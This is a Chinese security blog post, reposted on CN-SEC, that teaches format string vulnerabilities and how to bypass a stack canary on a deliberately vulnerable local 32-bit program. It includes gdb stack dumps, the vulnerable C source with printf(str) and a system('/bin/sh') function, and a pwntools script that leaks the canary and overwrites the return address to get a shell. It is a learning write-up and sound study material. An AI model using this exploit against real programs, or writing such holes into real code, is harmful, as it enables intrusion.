配合格式化字符串漏洞绕过canary保护机制

admin 2022年1月10日08:44:07安全文章评论15 views3529字阅读11分45秒阅读模式

配合格式化字符串漏洞绕过canary保护机制

0×01 起

(这只是一次小白的随笔记录,有些操作不太成熟,欢迎各位看官指出交流)

我们知道,缓冲区溢出漏洞利用的关键处就是溢出时,覆盖栈上保存的函数返回地址来达到攻击效果。于是就有人就设计出了很多保护机制:Canary、PIE、NX等。本文讨论的就是若程序只开启了canary保护机制,我们该怎么应对?该机制是在刚进入函数的时候,在栈底放一个标志位canary(又名金丝雀):


配合格式化字符串漏洞绕过canary保护机制


当缓冲区被溢出时,在返回地址被覆盖之前, canary会首先被覆盖。当函数结束时会检查这个栈上 canary的值是否和存进去的值一致,就可以判断程序是否发生了溢出等攻击,紧接着程序将执行___stack_chk_fail函数,继而终止程序。


(为了方式发生信息泄露以及其他漏洞的利用 canary使用x00对值进行截断,即canary的最低字节为00)


因此:我们绕过这种保护机制的方法,就是怎样使前后的canary判断正确。

一般canary有两种利用方式。

1.爆破canary

(大致了解了一下)


配合格式化字符串漏洞绕过canary保护机制


2.如果程序存在字符串格式化溢出漏洞,我们就可以输出canary并利用溢出覆盖canary从而达到绕过。

这里我们讲解第二种方式。

0×02 承

不过在讲解之前,我们先来学习一下格式化字符串漏洞?

相信很多人都学过C语言吧!而C语言最普通的却必不可少的就是printf()函数了!也许大多数人以前几乎没有怎么关注过这个函数,那么今天就重新刷新对它的认知。


printf在C语言中一般是这种写法:

printf(“%d”,a); //输出数a的十进制格式

其中双引号里面是a的输出格式要求 常见的还有:


%d - 十进制 - 输出十进制整数

%s - 字符串 - 从内存中读取字符串

%x - 十六进制 - 输出十六进制数

%c - 字符 - 输出字符

%p - 指针 - 指针地址

%n - 到目前为止所写的字符数

其中:

配合格式化字符串漏洞绕过canary保护机制


此外,我们更没有见过:

例:

%k$x表示访问第k个参数,并且把它以十六进制输出

%k$d表示访问第k个参数,并且把它以十进制输出

……

平时的程序是这样:


配合格式化字符串漏洞绕过canary保护机制


但是如果程序员一不小心这样写呢?


配合格式化字符串漏洞绕过canary保护机制


哈哈,似乎输出结果没什么区别!别急,因为你不知道的是:

实际上,printf允许参数的个数并不固定,其中上面双引号为第一个参数:格式化字符串,后面的参数在实际运行时将与格式化字符串中特定格式的子字符串进行一一对应,将格式化字符串中的特定子串,解析为相应的参数值。

此处我们只是单独地打印一个字符串hello_world,如果我们用户输入的是一个格式化字符format(如%s、%d、%k$x),那么printf就会读取栈上的“数据”,至于这个数据是什么?(我也不知道)请看后文:

再来:


配合格式化字符串漏洞绕过canary保护机制

配合格式化字符串漏洞绕过canary保护机制

配合格式化字符串漏洞绕过canary保护机制

此时:

配合格式化字符串漏洞绕过canary保护机制

main+15处,我们往上翻翻: 


配合格式化字符串漏洞绕过canary保护机制

而接下来的操作就是一直n操作到将printf参数入栈:

配合格式化字符串漏洞绕过canary保护机制


即:

汇编源码主体是:

 0x8049189 <main+39>    push   2   0x804918b <main+41>    push   1   0x804918d <main+43>    lea    edx, [eax - 0x1ff3]   0x8049193 <main+49>    push   edx   0x8049194 <main+50>    mov    ebx, eax ► 0x8049196 <main+52>    call   [email protected] <0x8049030>

栈内容是:

00:0000│ esp   0xffffd260 —▸ 0x804a00d ◂— and    eax, 0x64252064 /* '%d %d %d %d %s' */
01:00040xffffd264 ◂— 0x1
02:00080xffffd268 ◂— 0x2
03:000c│ 0xffffd26c ◂— 0x3
04:00100xffffd270 ◂— 0x10
05:00140xffffd274 —▸ 0x804a008 ◂— je 0x804a06f /* 'test' */
06:00180xffffd278 —▸ 0xffffd33c —▸ 0xffffd4e9 ◂— 'SHELL=/bin/bash'
07:001c│ 0xffffd27c —▸ 0x8049176 (main+20) ◂— add eax, 0x2e8a

配合格式化字符串漏洞绕过canary保护机制


这个时候我们又对源文件做一点改变:

配合格式化字符串漏洞绕过canary保护机制

重复以上步骤:

gcc -m32 -z execstack -fno-stack-protector -no-pie -o test test.c


配合格式化字符串漏洞绕过canary保护机制


输入r: 


配合格式化字符串漏洞绕过canary保护机制

上述C语言程序中,我们只给了五个参数:1,2,3,16,test,但是我们给的格式字符串有7个。于是,printf函数按照格式打印了七个数据,但是多出来-11460以及134517110不是我们输入的,而是保存在栈中的另外两个数据。通过这个特性,就有了格式化字符串漏洞。

至此,格式化漏洞差不多讲明白了吧!

补充:vc6.0++可能不支持这样格式溢出,如:


配合格式化字符串漏洞绕过canary保护机制


但是在linux里面就可以打印出

7th:70,4th:0040

0×03 转

现在我们正式进入今天的主题:

待试验程序:


配合格式化字符串漏洞绕过canary保护机制


#include<stdio.h>
void exploit()
{
system("/bin/sh");
}
void func()
{
char str[16];
read(0, str, 64);
printf(str);
read(0, str, 64);
}
int main()
{
func();
return 0;
}
gcc -no-pie -fstack-protector  -m32 -o 5.exe 5.c
checksec 5.exe

配合格式化字符串漏洞绕过canary保护机制


gdb 5.exe i bb funci bstart


配合格式化字符串漏洞绕过canary保护机制


然后一直输入n,直到遇见func函数: 


配合格式化字符串漏洞绕过canary保护机制


往上翻:


配合格式化字符串漏洞绕过canary保护机制


再n:


配合格式化字符串漏洞绕过canary保护机制


看见上面重点没?这就是今天的一个关键!(gs是一个段寄存器)

红框的意思是,从gs寄存器中取出一个4字节(eax)的值存到栈上。

我们可以直接输入canary:


配合格式化字符串漏洞绕过canary保护机制


这个时候我第一眼观察的就是我们前面所提到的:

canary设计是以“x00”结尾,本意就是为了保证canary可以截断字符串。泄露栈中canary的思路是覆盖canary的低字节,来打印出剩余的canary部分。

堆栈中的canary:


配合格式化字符串漏洞绕过canary保护机制


继续n,直到read函数调用:


配合格式化字符串漏洞绕过canary保护机制


再次查看栈(这个时候栈显示不完整,输入stack 20):


配合格式化字符串漏洞绕过canary保护机制


此时该canary所在位置离栈顶esp的偏移量为0x2c:


配合格式化字符串漏洞绕过canary保护机制


即(4个字节一组)11组。这个11很重要!等会我们就要用printf函数输出这个位置的canary。

往上翻:


配合格式化字符串漏洞绕过canary保护机制


输入n:


配合格式化字符串漏洞绕过canary保护机制


此时程序运行要求我们输入


配合格式化字符串漏洞绕过canary保护机制


这个时候我们就用上面所学的冷门格式化字符串%11$8x(代表输出): 


配合格式化字符串漏洞绕过canary保护机制


这个时候再n:


配合格式化字符串漏洞绕过canary保护机制


(由于上次时间问题,没有做完!今天继续做笔记。因为每次编译运行canary的值是随意分配的,所以以下canary的值在昨天同样的操作步骤下已经变了,不过!不影响!)


配合格式化字符串漏洞绕过canary保护机制


当函数结束时会检查这个栈上的值是否和存进去的值一致。

这个时候我们继续n,就会遇到第2个read函数,要求我们输入:


配合格式化字符串漏洞绕过canary保护机制


(看了这么久,估计源程序已经忘了!)

即:


配合格式化字符串漏洞绕过canary保护机制


经过上面的分析,我们已经知道第一个read函数的设置是为了打印出金丝雀的值,那么第二个read函数呢?

第二个函数就是我们精心构造的payload了!此时的payload就要保证在溢出攻击getshell的同时,就需要利用我们已经得到的canary值了!那么怎么利用已经得到的canary的值来得到payload呢?

这时我们可以使用python脚本进行第一次输入泄露canary后,在进行第二次输入的时候,在payload中将canary的位置填充成刚刚泄露出来的值即可。

找出exploit函数的入口地址!同样作为payload的一部分来getshell: 


配合格式化字符串漏洞绕过canary保护机制


脚本python:


配合格式化字符串漏洞绕过canary保护机制


from pwn import *p=process("./5.exe")p.sendline("%11$08x")canary=p.recv()[:8]print(canary) canary=canary.decode("hex")[::-1] coffset=4*4roffset=3*4raddr=p32(0x8049192)payload=coffset*'a'+canary+roffset*'a'+raddrp.sendline(payload)p.interactive()

嗯!对于这段payload构造理解起来可能是本篇最困难的地方……

先运行一下能否成功吧:


配合格式化字符串漏洞绕过canary保护机制


重新运行,我们可以看见canary的值又变了:a03dd300,并且成功getshell!

那么我就根据payload来倒推怎么溢出?


配合格式化字符串漏洞绕过canary保护机制


回到刚刚我们的第二个read函数输入的地方:


配合格式化字符串漏洞绕过canary保护机制

配合格式化字符串漏洞绕过canary保护机制


连个椭圆形代表的就是填充的a:


coffset=4*4

roffset=3*4

至此!payload构造成功并getshell!


配合格式化字符串漏洞绕过canary保护机制


本文始发于微信公众号(疯猫网络):配合格式化字符串漏洞绕过canary保护机制

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日08:44:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  配合格式化字符串漏洞绕过canary保护机制 http://cn-sec.com/archives/506642.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: